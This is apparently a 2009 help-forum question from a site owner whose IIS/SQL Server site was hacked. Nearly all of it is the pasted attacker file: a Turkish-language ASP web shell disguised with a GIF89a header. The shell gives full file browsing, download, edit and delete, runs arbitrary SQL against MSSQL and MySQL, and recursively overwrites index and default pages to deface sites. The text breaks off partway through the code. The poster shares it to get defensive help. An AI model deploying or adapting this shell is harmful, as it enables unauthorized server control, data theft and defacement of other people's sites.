Solved

Web Site Hack

Posted on 2009-05-08
7
2,479 Views
Last Modified: 2016-03-23
I am running IIS 6.0 with SQL Server.  My site has been hacked.  I fixed, but need to know how to keep this from happening again.  Thank you for your help
GIF89a;

<%

'if request("rootx") = "alfonso" then

'response.cookies("yes") = "1"

'response.cookies("yes").expires = now+352

'end if 

'if not request.cookies("yes") = "1" then

'response.end()

'end if

Server.ScriptTimeOut  = 7200

Fullpath=replace(Request.ServerVariables("PATH_TRANSLATED"),"/","\")

FilePath = mid(Fullpath,InStrRev(Fullpath,"\")+1)

FolderPath = Left(Fullpath,InStrRev(Fullpath,"\"))

const charset="abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789_-"

const karakter1="ABCDEFGHIJKLMNOPQRSTUVWXYZ"

const karakter2="abcdefghijklmnopqrstuvwxyz"

const karakter3="0123456789"

const karakter4="!@#$%^&*()-_+=~`[]{}|\:;<>,.?/"

mail_array = array("yahoo","hotmail","mynet","gmail","hacker")  'özel mailler yaratmak için, SPAM dan kaçýrmak için. Securityi aþmak için by ALFONSO

uzanti_array = array("com","net","biz","org","gov","br","info") 

yasak_array = array("ALFONSO","CYBERWARRIOR","CYBERSECURITY","GAL","GAL","TURK")

Dim FSO

Set FSO = CreateObject("Scripting.FileSystemObject") 

konum = Trim(request("konum"))
 

mode = request("mode")

FolderPath2 = request("FolderPath2")&"\"

islem = request("islem")

del = request("del")

file = request("file")

folder = request("folder")

table  = Request("table")

inject1  = Request("inject1")

inject2  = Request("inject2")

inject3  = Request("inject3")

inject4  = Request("inject4")

inject5  = Request("inject5")

cmdkod  = Request("cmdkod")

hacked = request("hacked")

Path = request("Path")

url = request("url")

count = request("count")

size = request("size")

dbname = request("dbname")

dbkadi = request("dbkadi")

dbsifre = request("dbsifre")

alfonsosql = request("alfonsosql")

sec = request("sec")

Usermd5 = request("Usermd5")

ara1 = request("ara1")

ara2 = request("ara2")

k1 = request("k1")

k2 = request("k2")

k3 = request("k3")

k4 = request("k4")

waiting = request("waiting")

coding = request("coding")

dizi = request("dizi")

Usersmd5 = request("Usersmd5")

salt = request("salt")

hash2 = request("hash2")

hash3 = request("hash3")

hash4 = request("hash4")

hash5 = request("hash5")

hash6 = request("hash6")

hash7 = request("hash7")

hash8 = request("hash8")

hash9 = request("hash9")

hash10 = request("hash10")
 

if konum = "" then

konum = FolderPath

else

FolderPath = konum

end if
 

if mode = "1" then

FolderPath = request.form("remote")

konum = request.form("remote")

end if
 

nolist = False

popup = False
 

if mode = "2" or mode = "3" or mode = "7" or mode = "8" or mode = "16" or mode = "17" or mode = "18" or mode = "19" or mode = "20" or mode = "21" or mode = "22" or mode = "24"  or mode = "25" or mode = "26" or mode = "27" or mode = "28" or mode = "29" or mode = "30" or mode = "31" or mode = "32" or mode = "33" or mode = "36" or mode = "38" or mode = "39" or mode = "40" or mode = "41" or mode = "42" or mode = "43" or mode = "44" or mode = "45" or mode = "99" then

popup = True

end if
 

if mode = "6" then

Response.Buffer=True

Set Fil = FSO.GetFile(file)

Response.contenttype="application/force-download"

Response.AddHeader "Cache-control","private"

Response.AddHeader "Content-Length", Fil.Size

Response.AddHeader "Content-Disposition", "attachment; filename=" & Fil.name

Response.BinaryWrite readBinaryFile(Fil.path)

Set f = Nothing: Set Fil = Nothing

response.end

end if
 

response.write "<title>ALFSO v 1.0 ALFONSO'nun fso'su // CW</title>"

response.write "<meta http-equiv=""Content-Type"" content=""text/html; charset=iso-8859-9"">"

response.write "<style>"

response.write "body{margin:0px;font-style:normal;font-size:10px;color:#FFFFFF;font-family:Verdana,Arial;background-color:#3a3a3a;scrollbar-face-color: #303030;scrollbar-highlight-color: #5d5d5d;scrollbar-shadow-color: #121212;scrollbar-3dlight-color: #3a3a3a;scrollbar-arrow-color: #9d9d9d;scrollbar-track-color: #3a3a3a;scrollbar-darkshadow-color: #3a3a3a;}"

response.write ".k1{font-family:Wingdings; font-size:15px;}"

response.write ".k2{font-family:Webdings; font-size:15px;}"

response.write "td{font-style:normal;font-size:10px;color:#FFFFFF;font-family:Verdana,Arial;}"

response.write "a{color:#EEEEEE;text-decoration:none;}"

response.write "a:hover{color:#40a0ec;}"

response.write "a:visited{color:#EEEEEE;}"

response.write "a:visited:hover{color:#40a0ec;}"

response.write "input,"

response.write ".kbrtm,"

response.write "select{background:#303030;color:#FFFFFF;font-family:Verdana,Arial;font-size:10px;vertical-align:middle; height:18; border-left:1px solid #5d5d5d; border-right:1px solid #121212; border-bottom:1px solid #121212; border-top:1px solid #5d5d5d;}"

response.write "textarea{background:#121212;color:#FFFFFF;font-family:Verdana,Arial;font-size:10px;vertical-align:middle; height:18; border-left:1px solid #121212; border-right:1px solid #5d5d5d; border-bottom:1px solid #5d5d5d; border-top:1px solid #121212;}"

response.write "</style>"

%>

<script language=javascript>

    function NewWindow(mypage, myname, w, h, scroll) {

        var winl = (screen.width - w) / 2;

        var wint = (screen.height - h) / 2;

            winprops = 'height='+h+',width='+w+',top='+wint+',left='+winl+',scrollbars='+scroll+',resizable'

        win = window.open(mypage, myname, winprops)

        if (parseInt(navigator.appVersion) >= 4) { win.window.focus(); }

    }

    function klasorkopya(yol){

        NewWindow(yol,"",400,130,"no");

    }

    function mass(yol){

        NewWindow(yol,"",555,600,"yes");

    }

    function tester(yol){

        NewWindow(yol,"",600,600,"yes");

    }  

    function klasor(yol){

        NewWindow(yol,"",420,450,"yes");

    }    

    function cmd(yol){

        NewWindow(yol,"",550,555,"no");

    }

    function biz(yol){

        NewWindow(yol,"",550,700,"no");

    }  

    function cmdhelp(yol){

        NewWindow(yol,"",500,230,"no");

    }   

    function somur(yol){

        NewWindow(yol,"",420,220,"yes");

    }       

</script>

<script language="JavaScript">

function openInMainWin(winLocation){

	window.opener.location.href = winLocation

	window.opener.focus();

}

</script>

<%

sub KlasorOku

	on error resume next

    Set f = FSO.GetFolder(FolderPath)

    Set fc = f.SubFolders

    For Each f1 In fc

        Response.Write "<table class=""kbrtm"" ><tr><td><font class=""k1""><a title="" Dizini Kopyala & Taþý "" href='"&FilePath&"?mode=2&konum="&FolderPath&"\"&f1.Name&"&Time="&time&"' onclick=""klasorkopya(this.href);return false;"">4</a></font> <font class=""k1""><a  title="" Dizini Sil "" href='"&FilePath&"?mode=4&konum="&FolderPath&"&del="&FolderPath&"\"&f1.Name&"&Time="&time&"'>û</a> 1</font><font size=2><b><a title="" Dizinin içine Gir "" href='"&FilePath&"?konum="&FolderPath&"\"&f1.Name&"&Time="&time&"'>"&f1.name&"</a></b></td></tr></table>"   

        Response.Flush

    Next

    call hata

end sub
 

sub DosyaOku

	on error resume next

    Set f = FSO.GetFolder(FolderPath)

    Set fc = f.Files

    For Each f1 In fc

        dosyaAdi = f1.name

        num = InStrRev(dosyaAdi,".")

        uzanti = lcase(Right(dosyaAdi,len(dosyaAdi)-num))

        downStr = "<a title=""Dosyayý Sil"" href='"&FilePath&"?mode=5&konum="&FolderPath&"&del="&FolderPath&"\"&f1.Name&"&Time="&time&"'>û</a><font face=webdings><a title="" Download et "" href='"&FilePath&"?mode=6&file="&f1.path&"&konum="&FolderPath&"&Time="&time&"'>Í</a></font><font face=wingdings><a title="" Dosyayý Kopyala & Taþý "" href='"&FilePath&"?mode=7&file="&f1.path&"&Time="&time&"' onclick=""klasorkopya(this.href);return false;"">4</a><a title="" Dosya Ad & Format Deðiþtir "" href='"&FilePath&"?mode=16&file="&f1.path&"&islem="&f1.name&"&konum="&FolderPath&"&Time="&time&"' onclick=""klasorkopya(this.href);return false;"">?</a></font>"

        response.Write "<table class=""kbrtm"" ><tr><td><font size=2>"

        select case uzanti

        case "mdb"

            Response.Write "<a title="" Db in içini Görmek , SQl sorgu yapmak için Týkla by alfonso ;) "" href='"&FilePath&"?mode=13&file="&FolderPath&"\"&f1.Name&"&konum="&FolderPath&"&Time="&time&"'>"&f1.name&" [<font color=yellow>"&FormatNumber(f1.size,0)&"</font>]"&"</a></b> <font face=wingdings size=4>M  "&downStr&"</font></td></tr></table>"

        case "asp"

            Response.Write "<a title="" Ýçini Görüntülemek için Týkla "" href='"&FilePath&"?mode=9&file="&FolderPath&"\"&f1.Name&"&konum="&FolderPath&"&Time="&time&"'>"&f1.name&" [<font color=yellow>"&FormatNumber(f1.size,0)&"</font>]"&"</a></b> <font face=wingdings size=4>± <a title="" Dosyayý Editlemek için Týkla by ALFONSO :) "" href='"&FilePath&"?mode=10&file="&f1.path&"&Time="&time&"&konum="&FolderPath&"'>!</a>"&downStr&"</font></td></tr></table>"

        case "jpg","gif"

            Response.Write "<a title="" Resmi Görmek için Týkla "" href='"&FilePath&"?mode=12&file="&FolderPath&"\"&f1.Name&"&konum="&FolderPath&"&Time="&time&"'>"&f1.name&" [<font color=yellow>"&FormatNumber(f1.size,0)&"</font>]"&"</a></b> <font face=webdings size=4>¢</font><font face=wingdings size=4>  "&downStr&"</font></td></tr></table>"

        case else

            Response.Write "<a title="" Ýçini Görüntülemek için Týkla "" href='"&FilePath&"?mode=9&file="&FolderPath&"\"&f1.Name&"&konum="&FolderPath&"&Time="&time&"'>"&f1.name&" [<font color=yellow>"&FormatNumber(f1.size,0)&"</font>]"&"</a></b> <font face=wingdings size=4>2 <a title="" Dosyayý Editlemek için Týkla by ALFONSO :) "" href='"&dosyaPath&"?mode=10&file="&f1.path&"&Time="&time&"&konum="&FolderPath&"'>!</a>"&downStr&"</font></td></tr></table>"

        end select

    Next

    call hata

end sub
 

sub Suruculer

	for each drive_ in FSO.Drives

		Response.Write "<tr bgcolor=""#3a3a3a""><td height=""20"" class=""kbrtm"">"

		Response.Write "<a href="" "&FilePath&"?konum="&drive_.DriveLetter&":/ "">"

		if drive_.Drivetype=1 then Response.write "&nbsp;&nbsp;<font class=""k1""><</font>&nbsp;Disket Sürücü [" & drive_.DriveLetter & ":]&nbsp;&nbsp;&nbsp;<a title=""Sürücü Detayý Ýçin Týkla"" href="""&FilePath&"?dspace="&drive_.DriveLetter&"&konum="&konum&"""><font class=""k1"">Ä</font></a>"

		if drive_.Drivetype=2 then Response.write "&nbsp;&nbsp;<font class=""k1"">;</font>&nbsp;Sabit Disk [" & drive_.DriveLetter & ":]&nbsp;&nbsp;&nbsp;<a title=""Sürücü Detayý Ýçin Týkla"" href="""&FilePath&"?dspace="&drive_.DriveLetter&"&konum="&konum&"""><font class=""k1"">Ä</font></a>"

		if drive_.Drivetype=3 then Response.write "&nbsp;&nbsp;<font class=""k1"">;</font>&nbsp;Çýkarýlabilir Disk [" & drive_.DriveLetter & ":]&nbsp;&nbsp;&nbsp;<a title=""Sürücü Detayý Ýçin Týkla"" href="""&FilePath&"?dspace="&drive_.DriveLetter&"&konum="&konum&"""><font class=""k1"">Ä</font></a>"

		if drive_.Drivetype=4 then Response.write "&nbsp;&nbsp;<font class=""k2"">³</font>&nbsp;Cd-Rom [" & drive_.DriveLetter & ":]&nbsp;&nbsp;&nbsp;<a title=""Sürücü Detayý Ýçin Týkla"" href="""&FilePath&"?dspace="&drive_.DriveLetter&"&konum="&konum&"""><font class=""k1"">Ä</font></a>"

		Response.Write "</a></td></tr>"

	next

		Response.Write "<tr bgcolor=""#3a3a3a""><td class=""kbrtm"" height=""20"">&nbsp;&nbsp;<a href="" "&FilePath&" ""><font class=""k2"">H</font> Local Path </a></td></tr>"

end sub
 

Sub SurucuInfo

	'Disk Alanýný Gösterir - Coded By ALFONSO ;)

	

	DriveSpace = Request("dspace")

	If Not DriveSpace = "" Then

	on error resume next

	Set driveObject = FSO.GetDrive(DriveSpace)

	D1 = Left((driveObject.FreeSpace/(driveObject.TotalSize*1.0))*100.0, 4)

	if err <> 0 then

	response.write "<center><br> <font color=#FE7A84> <font face=Wingdings size=5>N</font> Disk Hazýr deðil  !!!! :( <font face=Wingdings size=5>N</font></font> <br></center>"

	else

	D2 = Left(((driveObject.TotalSize - driveObject.FreeSpace)/(driveObject.TotalSize*1.0))*100.0, 4)

	D3 = 100

	D1a = 110 - D1

	D2a = 110 - D2

	D3a = 110 - D3

	Response.Write "<br><center><table cellspacing=0 cellpadding=0><tr><td style='background-color: #121212;' colspan=4 align=center class=kbrtm><b>Disk :</b>&nbsp;" & driveObject.DriveLetter & "</td></tr><tr><td class=kbrtm width=60>&nbsp;</td><td class=kbrtm width=100 align=center><b>Boþ Alan</b></td><td class=kbrtm width=100 align=center><b>Kullanýlan Alan</b></td><td class=kbrtm width=100 align=center><b>Toplam Alan</b></td></tr><tr><td height=110 class=kbrtm>&nbsp;</td><td class=kbrtm align=center><table cellpadding=0 cellspacing=0><tr><td colspan=3 height="&D1a&"></td></tr><tr height="&D1&"><td bgcolor=#009900 width=2></td><td bgcolor=#33CC00 width=15></td><td bgcolor=#009900 width=2></td></tr></table></td><td class=kbrtm align=center valign=bottom><table cellpadding=0 cellspacing=0><tr><td colspan=3 height="&D2a&"></td></tr><tr height="&D2&"><td bgcolor=#990000 width=2></td><td bgcolor=#CC0000 width=15></td><td bgcolor=#990000 width=2></td></tr></table></td><td class=kbrtm align=center valign=bottom><table cellpadding=0 cellspacing=0><tr><td colspan=3 height="&D3a&"></td></tr><tr height="&D3&"><td bgcolor=#006699 width=2></td><td bgcolor=#0088CC width=15></td><td bgcolor=#006699 width=2></td></tr></table></td></tr><tr><td class=kbrtm>&nbsp;<b>Yüzde :</b></td><td class=kbrtm align=center>"&D1&" %</td><td class=kbrtm align=center>"&D2&" %</td><td class=kbrtm align=center>"&D3&" %</td></tr><tr><td class=kbrtm>&nbsp;<b>Boyut :</b></td><td class=kbrtm align=center>&nbsp;" & FormatNumber(driveObject.FreeSpace / 1048576) & " MB</td><td class=kbrtm align=center>&nbsp;" & FormatNumber(driveObject.TotalSize / 1048576) - FormatNumber(driveObject.FreeSpace / 1048576) & " MB</td><td class=kbrtm align=center>&nbsp;" & FormatNumber(driveObject.TotalSize / 1048576) & " MB</td></tr></table></center><br><br><br>"

	end if

	Set driveObject = Nothing

	End If

end sub
 

sub yetkino(str)

response.write "<td class=""kbrtm"">&nbsp;&nbsp;&nbsp;<b><font color=#FBE1D7>"&str&" :</font></b> <font color=#FE7A84 class=""k1"">û</font>&nbsp;&nbsp;&nbsp;</td>"	

End Sub

sub yetkiyes(str)

response.write "<td class=""kbrtm"">&nbsp;&nbsp;&nbsp;<b><font color=#FAFEDE>"&str&" :</font></b> <font color=#C6FCBE class=""k1"">ü</font>&nbsp;&nbsp;&nbsp;</td>"

end Sub
 

sub Yetki

	on error resume next

    Set f = FSO.GetFolder(FolderPath)

    if err<>0 then

	yetkino("Okuma")

	yetkino("Yazma")

	yetkino("Silme")

    else

	yetkiyes("Okuma")
 

    on error resume next

    Set MyFile = FSO.CreateTextFile(FolderPath & "test.alfonso", True)

    MyFile.write "alfonso Was Here... =) Yazma - Okuma Testi için"

    set MyFile = Nothing

    if err<>0 then

	yetkino("Yazma")

	yetkino("Silme")

    else

	yetkiyes("Yazma")

        on error resume next

        FSO.DeleteFile FolderPath & "test.alfonso",true

        if err<>0 then

		yetkino("Silme")

        else

		yetkiyes("Silme")

        end if

    end if
 

    end if

    set f = nothing

end sub
 

Sub olmadi(str)

response.write "<br><center><font color=#FE7A84> <font face=Wingdings size=5>N</font> "&str&" :( <font face=Wingdings size=5>N</font> </font></center>"

End Sub
 

Sub oldu(str)

response.write "<br><center><font color=#C6FCBE> <font face=Wingdings size=5>N</font> "&str&" ;) Tebrikler Ýþlem Baþarýyla Gerçekleþtirildi.. by alfonso <font face=Wingdings size=5>N</font> </font></center>"

End Sub
 

Sub tablo12(str)

response.write "<tr bgcolor=""#121212""><td align=""center"" width=""100%""  valign=""middle"">"&str&"</td></tr>"

End Sub
 

Sub tablo30(str)

response.write "<tr bgcolor=""#303030""><td class=""kbrtm"" align=""center"" width=""100%""  valign=""middle"">"&str&"</td></tr>"

End Sub
 

Sub tablo12L(str)

response.write "<tr bgcolor=""#121212""><td align=""center"" width=""100%""  valign=""middle"">"&str&"</td></tr>"

End Sub
 

Sub tablo12O(str)

response.write "<tr bgcolor=""#121212""><td class=""kbrtm"" align=""center"" width=""100%""  valign=""middle"">"&str&"</td></tr>"

End Sub
 

sub Hata

    if err<>0 then

        Response.Write "<center><font color=red size=2>Hata : "&err.Description&"</font></center>"

    end if

end sub
 

Function ReadBinaryFile(FileName)

  Const adTypeBinary = 1

  Dim BinaryStream

  Set BinaryStream = CreateObject("ADODB.Stream")

  BinaryStream.Type = adTypeBinary

  BinaryStream.Open

  BinaryStream.LoadFromFile FileName

  ReadBinaryFile = BinaryStream.Read

End Function
 

Sub SQL_menu_by_alfonso

	response.write "<center><table width=""450"">"

	response.write "<tr class=""kbrtm"" valign=""top""><td colspan=""2"" align=""center"">"

	response.write "<form name=""dosyacopypaste"" action='"&FilePath&"' type=""post"">"

	response.write "<table class=""kbrtm"" cellpadding=""1"" cellspacing=""1"" bgcolor=""#5d5d5d"" width=""100%"">"

	tablo30(" <b>SQL Ýnjection Merkezi</b>")

	tablo30("&nbsp;")

	tablo12("<font color=#FE7A84> Kullanabilmeniz için SQL kouýtlarý bilmeniz gerek !!! <br> <font face=Wingdings size=5>N</font> Aksi Halde ASP DOsyaý Kitlenir. Cevap veremez. Server a Zarar verir.  <font face=Wingdings size=5>N</font></font>")

	tablo12(" Select <input value=""select"" type=""radio"" name=""islem"" checked> <input  size=""60"" type=""text"" name=""inject1"" value='Select * from "&table&"'>")

	tablo12(" Delete <input value=""delete"" type=""radio"" name=""islem"" > <input  size=""60"" type=""text"" name=""inject2"" value='Delete from "&table&"'>")

	tablo12(" Insert <input value=""insert"" type=""radio"" name=""islem"" > <input  size=""60"" type=""text"" name=""inject3"" value='Insert into "&table&" () values ()'>")

	tablo12(" Update <input value=""update"" type=""radio"" name=""islem"" > <input  size=""60"" type=""text"" name=""inject4"" value='Update "&table&" set .. where ..'>")

	tablo12(" Diðer <input value=""diger"" type=""radio"" name=""islem"" > <input  size=""60"" type=""text"" name=""inject5"" value='Drop "&table&"'>")

	tablo12("<input name=""mode"" type=""hidden"" value='15' ><input name=""sec"" type=""hidden"" value='"&sec&"' ><input name=""alfonsosql"" type=""hidden"" value='"&alfonsosql&"' ><input name=""file"" type=""hidden"" value='"&file&"' ><input name=""konum"" type=""hidden"" value='"&FolderPath&"' ><input name=""table"" type=""hidden"" value='"&table&"' ><br><input value="" SQL Ýnj. Uygula "" type=""Submit""><br><br>")

	if alfonsosql = "" then

		tablo12("<a href='"&FilePath&"?mode=13&file="&file&"&konum="&FolderPath&"&Time="&time&"'> .... ::: Tablolara Geri Dön ::: .... </a><br>")

	else

		tablo12("<a href='"&FilePath&"?mode=34&file="&file&"&konum="&konum&"&alfonsosql="&alfonsosql&"&islem=1&Time="&time&"'> .... ::: Tablolara Geri Dön ::: .... </a><br>")

	end if

	response.write "</form></table></td></tr></table><br></center>"

	response.write "<table align=""center"" class=""kbrtm""><tr><td align='center'> <a href='"&FilePath&"?mode=36&konum="&konum&"&Time="&time&"' onclick=""klasor(this.href);return false;""><b>...:::::: SQL Komut Yardým - Kullaným Klavuzu by alfonso ::::::...</b></a> </td></tr></table><br>"

end sub
 

Sub SQL_by_alfonso(sqlkonum,sqlkomut) 

	on error resume next

	Set objConn = Server.CreateObject("ADODB.Connection")

	Set objRcs = Server.CreateObject("ADODB.RecordSet")

	objConn.Provider = "Microsoft.Jet.Oledb.4.0"

	objConn.ConnectionString = sqlkonum

	objConn.Open

	if err <> 0 then

	response.write "<br><br><center> <font color=#FE7A84> <font face=Wingdings size=5>N</font> DataBase ile Baðlantýnýz Saðlanamadý !!! by alfonso :( <font color=#FE7A84> <font face=Wingdings size=5>N</font> </font> </center><br><br>"

	else

		on error resume next

		objRcs.Open sqlkomut,objConn, adOpenKeyset , , adCmdText

		if err <> 0 then

		response.write "<br><br><center> <font color=#FE7A84> <font face=Wingdings size=5>N</font> SQL Ýnjection Komutunuzda HATA var. ( Bilmiyorsan KullanMA :) ) by alfonso <font color=#FE7A84> <font face=Wingdings size=5>N</font> </font> </center><br><br>"

		else

			Response.Write "<center><table class=""kbrtm"" border=1 cellpadding=2 cellspacing=0 bordercolor=543152><tr bgcolor=silver>"

			for i=0 to objRcs.Fields.count-1

			    Response.Write "<td><font color=black><b>&nbsp;&nbsp;&nbsp;"&objRcs.Fields(i).Name&"&nbsp;&nbsp;&nbsp;</font></td>"

			next

			Response.Write "</tr>"

			do while not objRcs.EOF

			   Response.Write "<tr class=""kbrtm"">"

			   for i=0 to objRcs.Fields.count-1

			      Response.Write "<td class=""kbrtm"">"&Replace(objRcs.Fields(i).Value,"<","&lt;")&"&nbsp;</td>"

			   next

			      Response.Write "</tr>"

			      objRcs.MoveNext

			loop

			Response.Write "</table><br></center>"

		end if

	end if

end sub
 

Sub MSSQL_by_alfonso(sqlkonum,sqlkomut) 

	on error resume next

	Set objConn = Server.CreateObject("ADODB.Connection")

	Set objRcs = Server.CreateObject("ADODB.RecordSet")

	objConn.Open sqlkonum

	if err <> 0 then

	response.write "<br><br><center> <font color=#FE7A84> <font face=Wingdings size=5>N</font> DataBase ile Baðlantýnýz Saðlanamadýý !!! by alfonso :( <font color=#FE7A84> <font face=Wingdings size=5>N</font> </font> </center><br><br>"

	else

		on error resume next

		objRcs.Open sqlkomut,objConn, adOpenKeyset , , adCmdText

		if err <> 0 then

		response.write "<br><br><center> <font color=#FE7A84> <font face=Wingdings size=5>N</font> SQL Ýnjection Komutunuzda HATA var. ( Bilmiyorsan KullanMA :) ) by alfonso <font color=#FE7A84> <font face=Wingdings size=5>N</font> </font> </center><br><br>"

		else

			Response.Write "<center><table class=""kbrtm"" border=1 cellpadding=2 cellspacing=0 bordercolor=543152><tr bgcolor=silver>"

			for i=0 to objRcs.Fields.count-1

			    Response.Write "<td><font color=black><b>&nbsp;&nbsp;&nbsp;"&objRcs.Fields(i).Name&"&nbsp;&nbsp;&nbsp;</font></td>"

			next

			Response.Write "</tr>"

			do while not objRcs.EOF

			   Response.Write "<tr class=""kbrtm"">"

			   for i=0 to objRcs.Fields.count-1

			      Response.Write "<td class=""kbrtm"">"&objRcs.Fields(i).Value&"&nbsp;</td>"

			   next

			      Response.Write "</tr>"

			      objRcs.MoveNext

			loop

			Response.Write "</table><br></center>"

		end if

	end if

end sub
 

sub Tablolama()

on error resume next

if alfonsosql = "" then

	if sec = "mssql" then

		alfonsosql = "PROVIDER=SQLOLEDB;DATA SOURCE="&file&";UID="&dbkadi&";PWD="&dbsifre&";DATABASE="&dbname&""

	else

		alfonsosql = "Driver={MySQL ODBC 3.51 Driver};Server="&file&";Database="&dbname&";Uid="&dbkadi&";Pwd="&dbsifre&""

	end if

end if

Set objConn = Server.CreateObject("ADODB.Connection")

Set objADOX = Server.CreateObject("ADOX.Catalog")

objConn.Open alfonsosql

objADOX.ActiveConnection = objConn

if err = 0 then

Response.Write "<center><b><font size=3>Tablolar</font></br><br>"

response.write "<table class=""kbrtm"">"

For Each table in objADOX.Tables

    If table.Type = "TABLE" Then

        Response.Write "<tr><td><font face=wingdings size=5>4</font> <a href='"&FilePath&"?mode=35&alfonsosql="&alfonsosql&"&table="&table.Name&"&konum="&konum&"&time="&time&"'>"&table.Name&"</a></td></tr>"

    End If

Next

response.write "</table>"

response.write "</center>"

else

Call MSSQL_Form

yazortaa("<br><br><center> <font color=#FE7A84> <font face=Wingdings size=5>N</font> Server ile baðlantý Saðlanamadý !!! girilen Deðerler yanlýþ .. :( by alfonso <font face=Wingdings size=5>N</font> </font><br><br></center>")

end if

end Sub
 

sub MSSQL_Form()

response.write "<center><table align=""center"" ><tr><td>"

yazorta("<b> MY-MS SQL Server Connection 2.0 by alfonso </b>")

response.write "<table align=""center"" width=""100%"" class=""kbrtm""><tr><td align='center'><form name=""MssqlbyE_j_d?er"" method='post' action='"&FilePath&"?mode=34&konum="&konum&"&Time="&time&"'><input name='sec' checked value='mssql' type='radio'> <b>MsSQL</b>  &nbsp;&nbsp;  - &nbsp;&nbsp;  <input name='sec' value='mysql' type='radio'> <b>MySQL</b></td></tr><tr><td>Server Adý & IP : <input name='file' value='"&file&"' style='color=#C6FCBE' size=35 type='text'></td></tr><tr><td> DB Adý : <input name='dbname' style='color=#C6FCBE' type='text' value='"&dbname&"' size=44></td></tr><tr><td> KAdý : <input name='dbkadi' style='color=#C6FCBE' value='"&dbkadi&"' type='text' size=46></td></tr><tr><td> Þifre : <input name='dbsifre' style='color=#C6FCBE' type='text' value='"&dbsifre&"' size=46></td></tr><td align='center'> <input name='islem' type='hidden' value='1'><input name='gooo' value=' ..:: Baðlan ::..'  type='Submit'></td></tr></form></table>"

yazorta("TÜm haklarý Saklýdýr by alfonso =)")

response.write "</td></tr></table></center>"

end sub
 

sub MassCopier(hedef)

on error resume next

Set cloner = fso.GetFile(hacked)

cloner.Copy hedef,true

Set cloner = Nothing

end sub
 

sub MassCreater(yer,savsak)

on error resume next

Set savsakcom = FSO.CreateTextFile(yer, True)

savsakcom.write savsak

Set savsakcom  = Nothing

end sub
 

sub MassAttack2(yer,ej,svk)

if hash3 = "ok" then

yer = yer&"\"&svk

end if

on error resume next

 if not islem = "ozel" then

 	if hash9 = "copy" then

		MassCopier(yer&"\index.html")

		MassCopier(yer&"\index.htm")

		MassCopier(yer&"\index.asp")

		MassCopier(yer&"\index.cfm")

		MassCopier(yer&"\index.php")

		MassCopier(yer&"\default.html")

		MassCopier(yer&"\default.htm")

		MassCopier(yer&"\default.asp")

		MassCopier(yer&"\default.cfm")

		MassCopier(yer&"\default.php")

	else

		Call MassCreater(yer&"\index.html",ej)

		Call MassCreater(yer&"\index.htm",ej)

		Call MassCreater(yer&"\index.asp",ej)

		Call MassCreater(yer&"\index.cfm",ej)

		Call MassCreater(yer&"\index.php",ej)

		Call MassCreater(yer&"\default.html",ej)

		Call MassCreater(yer&"\default.htm",ej)

		Call MassCreater(yer&"\default.asp",ej)

		Call MassCreater(yer&"\default.cfm",ej)

		Call MassCreater(yer&"\default.php",ej)

	end if

 else

 	if hash9 ="copy" then

		MassCopier(yer&"\"&inject1) 

	else

		Call MassCreater(yer&"\"&inject1,ej)

	end if

 end if

 

a = Replace(FilePath&"?konum="&yer&"&Time="&time,"\","/")

If Err.Number = 0 Then

	response.write "<table width=""100%""><tr><td class=""kbrtm""><a href=# onClick=""openInMainWin('"&a&"');""> "&yer&" </a><font color=#C6FCBE> OK !! <font class=""k1"">ü</font></td></tr></table>"

else

	response.write "<table width=""100%""><tr><td class=""kbrtm""><a href=# onClick=""openInMainWin('"&a&"');""> "&yer&" </a><font color=#FE7A84> Noo :( !! <font class=""k1"">û</font></td></tr></table>"

end if

Err.Number = 0

Response.Flush

end sub
 

sub MassAttack(yer,ej,svk)

dim fastalfonso

on error resume next

Set f = FSO.GetFolder(yer)

Set fc = f.SubFolders

For Each f1 In fc
 

if hash3 = "ok" then

fastalfonso = f1.path&"\"&svk

else

fastalfonso = f1.path

end if
 

 if not islem = "ozel" then

 	if hash9 = "copy" then

		MassCopier(fastalfonso&"\index.html")	

		MassCopier(fastalfonso&"\index.htm")

		MassCopier(fastalfonso&"\index.asp")

		MassCopier(fastalfonso&"\index.cfm")

		MassCopier(fastalfonso&"\index.php")

		MassCopier(fastalfonso&"\default.html")

		MassCopier(fastalfonso&"\default.htm")

		MassCopier(fastalfonso&"\default.asp")

		MassCopier(fastalfonso&"\default.cfm")

		MassCopier(fastalfonso&"\default.php")

	else

		Call MassCreater(fastalfonso&"\index.html",ej)	

		Call MassCreater(fastalfonso&"\index.htm",ej)

		Call MassCreater(fastalfonso&"\index.asp",ej)

		Call MassCreater(fastalfonso&"\index.cfm",ej)

		Call MassCreater(fastalfonso&"\index.php",ej)

		Call MassCreater(fastalfonso&"\default.html",ej)

		Call MassCreater(fastalfonso&"\default.htm",ej)

		Call MassCreater(fastalfonso&"\default.asp",ej)

		Call MassCreater(fastalfonso&"\default.cfm",ej)

		Call MassCreater(fastalfonso&"\default.php",ej)

	end if

 else

 	if hash9 = "copy" then

		MassCopier(fastalfonso&"\"&inject1) 

	else

		Call MassCreater(fastalfonso&"\"&inject1,ej) 	

	end if

 end if
 

	a = Replace(FilePath&"?konum="&fastalfonso&"&Time="&time,"\","/")

	If Err.Number = 0 Then

		response.write "<table width=""100%""><tr><td class=""kbrtm""><a href=# onClick=""openInMainWin('"&a&"');""> "&fastalfonso&" </a><font color=#C6FCBE> OK !! <font class=""k1"">ü</font></td></tr></table>"

	else

		response.write "<table width=""100%""><tr><td class=""kbrtm""><a href=# onClick=""openInMainWin('"&a&"');""> "&fastalfonso&" </a><font color=#FE7A84> Noo :( !! <font class=""k1"">û</font></td></tr></table>"

	end if

	Err.Number = 0

	Response.Flush

	

	if islem = "brute" then

		Call MassAttack(f1.path&"\",ej,svk)

	end if

Next

end sub
 

Sub tester(yer)

	on error resume next

	Set f = FSO.GetFolder(yer)

	Set fc = f.SubFolders

	For Each f1 In fc

	

	a = Replace(FilePath&"?konum="&f1.path&"&Time="&time,"\","/")

	response.write "<table width=""100%""><tr><td class=""kbrtm""><a href=# onClick=""openInMainWin('"&a&"');""> "&f1.path&" </a> "

	Response.Flush

	

	Err.Number = 0

	on error resume next

	Set f = FSO.GetFolder(f1.path)

	if Err.Number <> 0 then

		response.write "&nbsp;<b><font color=#FBE1D7>Oku :</font></b> <font color=#FE7A84 class=""k1"">û</font>&nbsp;"

	else

		response.write "&nbsp;<b><font color=#FAFEDE>Oku :</font></b> <font color=#C6FCBE class=""k1"">ü</font>&nbsp;"

	end if

	set f = nothing

	Err.Number = 0

	Response.Flush

	

	on error resume next

	Set MyFile = FSO.CreateTextFile(f1.path & "test.alfonso", True)

	MyFile.write " ALFONSO Was Here "

	set MyFile = Nothing

	if Err.Number <> 0 then

